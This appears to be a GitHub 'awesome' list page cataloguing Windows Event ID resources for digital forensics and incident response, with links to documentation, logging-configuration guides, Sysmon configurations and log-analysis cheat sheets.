awesome-event-ids
Event IDs
A collection of Event ID resources useful for Digital Forensics and Incident Response
Collection of Event ID ressources useful for Digital Forensics and Incident Response
588 stars
24 watching
85 forks
last commit: 5 months ago
Linked from 1 awesome list
dfirdigitalforensicsforensicsincident-responseir
Awesome Event IDs / Resources / Event ID databases | |||
| EventTracker Knowledgebase | Database | ||
| MyEventlog.com | Database | ||
Awesome Event IDs / Resources / Event ID documentation | |||
| Kaspersky Security for Microsoft Exchange | Official resource | ||
| Microsoft Defender Antivirus | Official resource | ||
| Microsoft Windows Security Auditing | Official resource | ||
| Microsoft Windows Security Auditing by Randy Franklin Smith | Better known as | ||
| Notable Event IDs | 586 | 30 days ago | Collection of common event IDs with descriptions |
| Sysmon | Official resource | ||
| Symantec Endpoint Protection 14.0.X | Official resource | ||
| Symantec Endpoint Protection Manager | Official resource | ||
| Events and Errors - Windows Server 2008 | Collection of event IDs from different windows event source. Applies to Windows Server 2008 and similar. (Official resource) | ||
| Finding Forensic Goodness In Obscure Windows Event Logs | List of lesser-known Event IDs | ||
Awesome Event IDs / Resources / Event ID configuration and monitoring suggestions / General | |||
| Audit Policy Recommendations | Audit Policy Recommendations by Microsoft | ||
| SIEM Tactics, Techniques, and Procedures | 586 | 30 days ago | Comprehensive SIEM resources be TonyPhipps |
| Windows Auditing Mindmap | 1,044 | 3 months ago | Set of Mindmaps providing a detailed overview of the different Windows auditing capacities and event log files |
Awesome Event IDs / Resources / Event ID configuration and monitoring suggestions / PowerShell | |||
| Script Block Logging | Enable 4104 | ||
| Module Logging | |||
| Malware Archeology PowerShell Logging Cheat Sheet | |||
| Greater Visibility Through PowerShell Logging | |||
| PowerShell Logging for the Blue Team | |||
Awesome Event IDs / Resources / Event ID configuration and monitoring suggestions / Security Auditing | |||
| Command line Process Auditing | Enable 4688 featuring command line | ||
| Critical Windows Event ID's to Monitor | Monitoring suggestions | ||
| Events to Monitor | Official resource | ||
| Monitoring Guidance | 274 | about 3 years ago | Event monitoring guidance from JSCU (Joint SIGINT Cyber Unit) from Netherlands. With volume estimates, and WEC/WEF configurations |
| Malware Archeology Windows Logging Cheat Sheet | |||
| Malware Archeology Advanced Windows Logging Cheat Sheet | |||
| Malware Archeology Splunk Logging Cheat Sheet | about specific exclusions to avoid getting noise from the Splunk Universal Forwarder agent | ||
| Malware Archeology File Auditing Cheat Sheet | |||
| Malware Archeology Registry Auditing Cheat Sheet | |||
| Malware Archeology ATT&CK Logging Cheat Sheet | From 2018 | ||
| US NSA Spotting the Adversary with Windows Event Log Monitoring | Covers quite a lot of ground | ||
Awesome Event IDs / Resources / Event ID configuration and monitoring suggestions / Security Auditing / US NSA Spotting the Adversary with Windows Event Log Monitoring | |||
| US NSA Event Forwarding Guidance | 852 | about 4 years ago | Companion repository with WEF configurations, scripts to configure WEF, and WEB subscriptions in XML format |
Awesome Event IDs / Resources / Event ID configuration and monitoring suggestions / Security Auditing | |||
| UK NCSC - Logging Made Easy WEC (Windows Event Collection) Configuration File | 706 | about 1 year ago | |
| Windows Security Monitoring - Policy & Event IDs | Spreadsheet with recommendations sorted by system functions | ||
| EventID Policy Map | Spreadsheet with policy map as well as reference collection | ||
| Windows security event log library | Small database with explanations and monitoring suggestions | ||
| Yamato Security's Ultimate Windows Event Log Configuration Guide For DFIR And Threat Hunting | 556 | about 1 year ago | |
Awesome Event IDs / Resources / Event ID configuration and monitoring suggestions / Sysmon | |||
| Configuration by SwiftOnSecurity | 4,803 | 5 months ago | Configuration file template with default high-quality event tracing |
Awesome Event IDs / Resources / Event ID configuration and monitoring suggestions / Sysmon / Configuration by SwiftOnSecurity | |||
| Fork of SwiftOnSecurity by Neo23x0 Florian ROTH | 454 | 10 months ago | Same as above, with all PR |
Awesome Event IDs / Resources / Event ID configuration and monitoring suggestions / Sysmon | |||
| Configuration by olafhartong | 2,661 | 3 months ago | A repository of Sysmon configuration modules |
| Malware Archeology Sysmon Logging Cheat Sheet | |||
| Sysmon Community Guide | 1,147 | 6 months ago | |
Awesome Event IDs / Resources / Event ID analysis / General | |||
| EVTX Attack Samples | 2,248 | almost 2 years ago | EVTX samples recorded during attack simulations by sbousseaden |
| EVTX-to-MITRE-Attack | 527 | 3 months ago | More than 170 EVTX samples matched to MITRE TTPs provided by |
| Tool Analysis Result Sheet | Logs analyzed after tool execution by JPCERT | ||
| EvtxECmd Map Repository | 282 | 3 months ago | Maps used by Eric Zimmerman's EvtxECmd which provide examples of Event IDs with documentation, lookup tables, and important values within each respective event ID which are parsed by EvtxECmd using the associated Map |
| Event Log Observer | View, analyze and monitor events recorded in Microsoft Windows event logs | ||
| Splunk advanced input configuration for Windows | 81 | about 2 months ago | Provides an advanced input.conf file for Windows and 3rd party related software with more than 70 different event log mapped to the MITRE Att&CK |
| Windows Security Event ID Helper | 8 | over 1 year ago | [ ] Will allow you to filter on each GPO setting and display all Event IDs produced by it |
Awesome Event IDs / Resources / Event ID analysis / Antivirus | |||
| Antivirus Event Analysis Cheat Sheet | Antivirus Event Analysis Cheat Sheet | ||
Awesome Event IDs / Resources / Event ID analysis / PowerShell | |||
| Attack and Defense Around PowerShell Event Logging | PowerShell logging deep dive from different perspectives by Mina Hao | ||
Awesome Event IDs / Resources / Event ID analysis / RDP | |||
| RDP Logon / Logoff events 1 | RDP event chain by Jonathon Poling | ||
| RDP Logon / Logoff events 2 | RDP deep dive on 1149 by Mike Cary | ||
Awesome Event IDs / Resources / Event ID analysis / SMB | |||
| SMB error events (local collection) | |||
Awesome Event IDs / Resources / Event ID analysis / Task Scheduler | |||
| Task Scheduler Event IDs | List of the most common Event IDs for Windows Scheduled Tasks by mnaoumov | ||
Awesome Event IDs / Resources / Event ID analysis / Windows Remote Command Execution | |||
| Traces of Windows remote command execution | Blogpost focused on remote command execution techniques used by attackers and read teamers and detailed logging recommendations | ||
Awesome Event IDs / Resources / Event ID analysis / Windows Specific Event IDs | |||
| Windows Event ID 4776 [SOLVED] | Blogpost explaining the meaning of 4776 by Diego Asturias | ||
Awesome Event IDs / Contributing | |||
| awesome-incident-response | 7,682 | 4 months ago | |
| awesome-forensics | 4,000 | 11 days ago | |
| awesome-forensicstools | 487 | about 4 years ago | |
| awesome-security | 12,479 | 4 months ago | |
meirwah/awesome-incident-responseMore related projects:
-
yamato-security/hayabusa
-
clong/detectionlab
-
mhaggis/sysmon-dfir
-
-
geeksniper/active-directory-pentest
-
withsecurelabs/chainsaw
-
swiftonsecurity/orgkit
-
-
karneades/malware-persistence
-
redcanaryco/atomic-red-team
-
palantir/alerting-detection-strategy-framework
-
drewnoakes/metadata-extractor-dotnet
-